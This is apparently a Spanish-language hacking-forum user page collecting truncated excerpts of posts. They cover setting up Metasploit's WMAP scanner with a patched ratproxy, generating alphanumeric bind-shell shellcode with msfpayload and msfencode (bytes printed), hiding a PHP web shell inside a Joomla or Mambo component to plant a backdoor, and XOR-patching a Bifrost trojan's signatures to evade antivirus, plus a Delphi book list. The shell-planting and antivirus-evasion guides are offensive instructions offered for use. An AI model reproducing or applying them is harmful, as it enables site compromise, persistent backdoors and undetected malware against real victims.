![[x]](http://www.diosdelared.com/images/tecnico.jpg "Artículo técnico")
Escaner Web WMAP
Publicado el 26/07/2010 12:07:00 en Hacking Web. Total de votos: 8 Votar
WMAP es un escaner de vulnerabilidad web con muchas caracteristicas, que fue originalmente creado a partir de una herramienta llamada SQLMap. Esta herramienta ofrece la habilidad de tener un proxy y poder capturar paquetes para realizar analisis de vulnerabilidad. Primero tenemos que descargar un proxy que sea compatible y parchearlo con el Metasploit patch. Tambien tenga en cuenta, que si no lo ha hecho ya, instale rubygems y ruby-sqlite3 ya que es un requisito.
root@reactos:/pentest/exploits/framework3# wget http://ratproxy.googlecode.com/files/ratproxy-1.58.tar.gz
--2009-06-29 21:41:02-- http://ratproxy.googlecode.com/files/ratproxy-1.58.tar.gz
Resolving ratproxy.googlecode.com... 74.125.93.82
Connecting to ratproxy.googlecode.com|74.125.93.82|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 168409 (164K) [application/x-gzip]
Saving to: 'ratproxy-1.58.tar.gz'
100%[===================================>] 168,409 201K/s
in 0.8s 2009-06-29 21:41:03 (201 KB/s) - 'ratproxy-1.58.tar.gz' saved [168409/168409]
root@bt4:/pentest/exploits/framework3# tar -zxvf ratproxy-1.58.tar.gz
Unpacked
root@bt4:/pentest/exploits/framework3# cd ratproxy
root@bt4:/pentest/exploits/framework3/ratproxy# patch -d . < /pentest/exploits/framework3/external/ratproxy/ratproxy_wmap.diff
patching file Makefile
patching file ratproxy.c
Hunk #8 succeeded at 1785 (offset 9 lines).
Hunk #9 succeeded at 1893 (offset 9 lines).
patching file http.c
Hunk #3 succeeded at 668 (offset 8 lines).
root@bt4:/pentest/exploits/framework3/ratproxy# make
Compiled no errors.
Ahora que tenemos ratproxy parcheado y listo, tenemos que configurar el proxy para permitir que las comunicaciones pasen a traves del tunel de nuestro proxy y permitir Metasploit WMAP. Primero abre Firefox y sigue las opciones, en el menu Edit, Preferences, Advanced, Network, Setting, Manual proxy configuration, seleccione "Usar este proxy para todos los protocolos" y en el campo proxy HTTP, introducir localhost y establecer en el puerto 8080.
Una vez que este configurado, usaremos una serie de comandos, iremos a la pagina web, y de ultimo la atacaremos. Sigamos el proceso y veamos como es. Primero necesitamos configurar y conectarnos a nuestra base de datos.
root@reactos:/pentest/exploits/framework3# ./msfconsole
=[ metasploit v3.3-testing [core:3.3 api:1.0]
+ -- --=[ 381 exploits - 231 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 156 aux
msf > db_create wmap.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmap.db
msf > load db_wmap
[*] =[ WMAP v0.6 - et [ ] metasploit.com
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmap.db
[*] Successfully connected to the database
[*] File: wmap.db
En otra ventana de terminal o pestaña, ejecute ratproxy con los registros activos, apuntando a la base de datos que creamos.
root@reactos:/pentest/web/ratproxy#... [/url]
[/trombi]
Continúa aquí...Comentarios: 5 | Leer comentarios Generar shellcode
Publicado el 19/07/2010 12:07:00 en Seguridad. Total de votos: 5 Votar
Hay veces donde se necesita tener un codigo shell alfanumerico puro porque la aplicacion explotada filtra los caracteres. MSF puede generar un codigo shell alfanumerico facilemente a travez de msfencode. Por ejemplo, para generar un mezcla alfanumerica de mayusculas y minisculas codificada, podemos usar el siguiente comando:
root@fuck:/pentest/exploits/framework3# ./msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/alpha_mixed
[*] x86/alpha_mixed succeeded with size 659 (iteration=1)
unsigned char buf[] =
"\x89\xe2\xdb\xdb\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4d\x38\x4c\x49\x45\x50\x45\x50\x45\x50\x43\x50\x4d\x59"
"\x4d\x35\x50\x31\x49\x42\x42\x44\x4c\x4b\x50\x52\x50\x30\x4c"
"\x4b\x51\x42\x44\x4c\x4c\x4b\x51\x42\x45\x44\x4c\x4b\x44\x32"
"\x51\x38\x44\x4f\x4e\x57\x50\x4a\x47\x56\x46\x51\x4b\x4f\x50"
"\x31\x49\x50\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x45\x52\x46\x4c"
"\x47\x50\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x4b\x52\x4a"
"\x50\x51\x42\x50\x57\x4c\x4b\x46\x32\x42\x30\x4c\x4b\x47\x32"
"\x47\x4c\x45\x51\x4e\x30\x4c\x4b\x47\x30\x44\x38\x4d\x55\x49"
"\x50\x44\x34\x50\x4a\x45\x51\x48\x50\x50\x50\x4c\x4b\x50\x48"
"\x44\x58\x4c\x4b\x51\x48\x51\x30\x43\x31\x4e\x33\x4b\x53\x47"
"\x4c\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4e\x36\x50\x31"
"\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x45"
"\x51\x49\x57\x50\x38\x4d\x30\x42\x55\x4c\x34\x45\x53\x43\x4d"
"\x4c\x38\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x51\x48\x4c"
"\x4b\x51\x48\x47\x54\x45\x51\x49\x43\x42\x46\x4c\x4b\x44\x4c"
"\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x43\x31\x48\x53\x4c\x4b\x43"
"\x34\x4c\x4b\x43\x31\x48\x50\x4c\x49\x50\x44\x51\x34\x51\x34"
"\x51\x4b\x51\x4b\x45\x31\x46\x39\x51\x4a\x50\x51\x4b\x4f\x4b"
"\x50\x51\x48\x51\x4f\x51\x4a\x4c\x4b\x44\x52\x4a\x4b\x4b\x36"
"\x51\x4d\x43\x58\x50\x33\x50\x32\x43\x30\x43\x30\x42\x48\x43"
"\x47\x43\x43\x50\x32\x51\x4f\x50\x54\x43\x58\x50\x4c\x43\x47"
"\x51\x36\x43\x37\x4b\x4f\x4e\x35\x4e\x58\x4a\x30\x43\x31\x45"
"\x50\x45\x50\x51\x39\x49\x54\x50\x54\x46\x30\x43\x58\x46\x49"
"\x4b\x30\x42\x4b\x45\x50\x4b\x4f\x4e\x35\x50\x50\x50\x50\x50"
"\x50\x46\x30\x51\x50\x46\x30\x51\x50\x46\x30\x43\x58\x4a\x4a"
"\x44\x4f\x49\x4f\x4d\x30\x4b\x4f\x48\x55\x4d\x47\x50\x31\x49"
"\x4b\x51\x43\x45\x38\x43\x32\x45\x50\x44\x51\x51\x4c\x4d\x59"
"\x4d\x36\x42\x4a\x44\x50\x50\x56\x51\x47\x42\x48\x48\x42\x49"
"\x4b\x46\x57\x43\x57\x4b\x4f\x48\x55\x51\x43\x50\x57\x45\x38"
"\x48\x37\x4b\x59\x4... [/url]
[/trombi]
Continúa aquí...Comentarios: 1 | Leer comentarios Subir Web Shell a Joomla y Mambo
Publicado el 05/07/2010 12:07:00 en Hacking Web. Total de votos: 6 Votar
Bueno este tutorial espero que les ayude,es una guía que les excplicarqa una forma de subir una Shell remota a estos CMS, ya teniendo permisos de Administrador y estar logueado.
fuente:http://foro.undersecurity.net
Joomla:
En primer lugar debemos descargar algún componente a instalar, en este caso elegimos un componente de Chat llamado:
El archivo descargado es un .Zip, el cual al descomprimir nos vamos a encontrar con los siguientes archivos (los cuales pueden variar según el componente que descargen):
chat.php
chat.xml
controller.php
A continuación copiamos en la carpeta nuestra Shell (llamada z.php) y editamos el archivo con extensión .XML agregando entre <file></file> el nombre de nuestra Shell de la siguiente forma:
Una vez hecho esto, volvemos a comprimir la carpeta, ahora con el archivo .xml editado, en resumen los siguientes archivos:
chat.php
chat.xml
controller.php
z.php (Nuestra Shell)
Ingresemos en la Administración de Joomla y en el menú "Extensiones" ingresamos en "Instalar/Desinstalar", tal como se vé en la imagen:
Una vez ingresados, donde dice "Subir paquete" en Archivo empaquetado seleccionamos nuestra shell previamente comprimida con los archivos del componente:
Una vez que hallamos confirmado que la instalación resultó exitosa (ver imagen):
Accedemos al siguiente directorio:
www.directoriojoomla.net/components/com_chat/z.php
Y ya tenemos nuestra Shell, tal como se vé en la imagen.
Mambo:
En esta ocasión utilizaré el componente de encuestas (descargar
aqui), se realizan los mismos pasos que hicimos en Joomla.
Una vez la carpeta comprimida con la Shell (z.php) dentro, entramos al panel de Administracion y ponemos en el menú "Instaladores" la opción "Universal", como en la imagen:
Tras confirmar que la instalación se ha realizado con éxito (ver imagen)
Ingresamos a nuestra Shell oculta:
www.directoriomambo.net/modules/z.php
Y por arte de Magia:
saludos..
Comentarios: 24 | Leer comentarios Metodo XOR
Publicado el 14/06/2010 12:06:00 en Hacking General. Total de votos: 4 Votar
Bueno aca les traigo un manual con el Metodo XOR fuente ElHacker.net espero que lo disfruten..
el Metodo XOR, este metodo va muy bien para modificar las firmas pero no muy bien para la Heuristica. Bueno empezemos, vamos a necesitar estos programas:
*Olly Dbg
*Hex WorckShop o cualquier editor Hexadecimal
*Topo
Este metodo consiste en, si abrimos algun server o stub de algun crypter con algun editor Hexadecimal, veremos algo asi:
Una supocicion ya que tome una firma al azar y ustedes lo van hacer con una que detecte su antivirus o los antivirus, bueno suponiendo que la firma detectada sea 45 como muestra la imagen esto es lo que haremos, vamos a INICIO>EJECUTAR: y escribimos "calc" sin las comillas o simplemente abrimos la calculadora de windows :P y la ponemos en Hex y hacemos esta operacion:
45 XOR 0E = 4B
4B XOR 0E = 45
Se dan cuentan? el XOR es reversible y lo que hara en cambiar la firma detectada asi no lo detectara su antivirus, pero si solo hacemos esto el server o crypter quedara inutilizable, por eso tenemos que
agregar un codigo que lo que hara es que al ejecutarse nuestro server en memoria cambia la firma cambiada por la original, espero se me entienda...Bueno continuamos ya que esto es solo teoria hasta el momento.Vamos a nuestro Olly y abrimos nuestro server o stub (para este ejemplo use el server del Bifrost) y anotamos la direccion del entrypoint que la primera que aperece en el Olly tal cual se ve en la imagen,esta la usaremos mas adelante.
en este paso solo era para anotar el Entrypoint ahora continuamos...
Teniendo nuestra firma cercada y como dije suponiendo en mi caso que sea "45" como la imagen y habiendo hecho la operacion en la calculadora la cambiamos por el resultado del XOR. No te olvides anotar el offset donde modificaste la firma ya que lo vamos a necesitar mas adelante.
y guardamos nuestro server... bien esto estara inservible asi que tendremos que agregar ese pequeño codigo que les decia anteriormente pero antes debemos hacer un lugar para meter este codigo y que apunte al Entrepoint o inicio de nuestro ejecutable, para ello utilizaremos el Topo, lo abrimos marcamos las opciones como la imagen y le damos a Do It!
ahora vamos a nuestro Olly y abrimos nuestro server ya pasado por el topo y se vera algo asi:
Bueno ahora hacemos click derecho con el mouse y vamos a View... Executable file.. como en la imagen:
Nos encontramos con otra pantalla... [/trombi]
Continúa aquí...Comentarios: 2 | Leer comentarios Manuales y Libros de Delphi
Publicado el 13/06/2010 12:06:00 en Programación General. Total de votos: 6 Votar
Bueno aca les traigo una gran recopilacion de Manuales y Libros de Delphi sacados de indetectables.net espero que los disfruten :)
Libros de Delphi:
Borland Delphi 6 - Developer's Guide.pdf
Borland Delphi 7 Developer's Guide.pdf
Borland Delphi Graphics And Game Programming Exposed With Directx 7.0.pdf
Delphi - Delphi Learning Pack (8600 Pages).pdf
Delphi - Visual Component Library.pdf
Delphi 4 Unleashed.CHM
Delphi API Grafico Win32.pdf
Delphi Basics (ingles).chm
Delphi Developer’s Guide to XML.pdf
Delphi Frequently Asked Questions.chm
Delphi Graphics and Game Programming.chm
Delphi Learning Pack (9 Books in 1 File - 3000 Pages).pdf
Delphi Learning Pack.pdf
Delphi Source Library.chm
Essential Delphi.pdf
Inside Delphi 2006 (ingles).chm
Mastering Delphi 6.pdf
Mastering Delphi 7.chm
Teach Yourself Borland Delphi 4 in 21 Days.chm
The Tomes Of Delphi 3 - Win32 Graphical Api.chm
The Tomes of Delphi Algorithms and Data Structures.pdf
The Tomes of Delphi Basic 32-bit Communications Programming.pdf
The Tomes Of Delphi Win32 Shell Api Windows 2000 Edition.pdf
The Tomes of Delphi, Win32 Core API.pdf
The Tomes of Delphi. Developer's Guide to Troubleshooting.pdf
Manuales de Delphi:
ADOyDelphi_Isi.pdf
Aplicaciones MDI.pdf
Archivos proyectados.pdf
Arrays.pdf
Base de Datos.pdf
BASM.pdf
Breve intro. a los componentes INDY.pdf
Canvas.pdf
CodigoBarras.pdf
comparativa.pdf
Contenedores Eventos Menús.pdf
Crear componentes delphi.pdf
Creating a CLX Database Application.pdf
Creating a Text Editor using Delphi.pdf
Curso de Delphi básico.pdf
Curso de Delphi.pdf
Curso Delphi.pdf
Delphi 3D Glscene Delphix.chm
Delphi Component Writer's Guide- Delphi for Windows.pdf
Delphi Developer's Guide to OpenGL.pdf
DelphiCOM.pdf
DelphiOrigen.pdf
Dynamic Link Libraries (DLLs).pdf
El registro.pdf
EstProg.pdf
Excepciones.pdf
FechaSQL.pdf
Formularios (SDI-MDI-cuadros de diálogo).pdf
Fundamentals of Database Development in Delphi.pdf
IBX.pdf
Iniciación a Delphi.pdf
InterBase User's Guide - Delphi for Windows.pdf
Introducción a los archivos de recursos.pdf
Introducción al API Wininet.pdf
Introducción general.pdf
La cara oculta de Delphi 4 (por Ian Marteens).pdf
La memoria virtual.pdf
La pila.pdf
Manejo de las excepciones de la VCL.pdf
Mastering Delphi Graphics.pdf
memoriavirtual.pdf
ModeladoBD.pdf
Montones.pdf
Object Oriented Programming.pdf
ObjetosAux_2.pdf
ObjetosAux_3.pdf
ObjetosAux_4.pdf
ObjetosAux_5.pdf
ObjetosAux_6.pdf
ObjetosAux_7.pdf
ObjetosAux_I.pdf
OOPenDelphi1.pdf
OpenGL.pdf
POO.pdf
procedimientos_almacenados.pdf
Programación con Delphi.pdf
Programación multihilo, algunos conceptos previos.pdf
ProgramaWeb.pdf
QReport.pdf
QuickReport.pdf
Recursión.pdf
Select.pdf
Sistema.pdf
Sockets.pdf
SPCursorInformix.pdf
SQL-.pdf
SQL.pdf
Strings.p... [/trombi]
Continúa aquí...Comentarios: 1 | Leer comentarios 
![[x]](http://www.diosdelared.com/images/add.ico)
![[x]](http://ddlr.servepics.com/rd.php?go=http://img64.imageshack.us/img64/3792/umbrellacorp3.png "reactos")
Nick: reactos
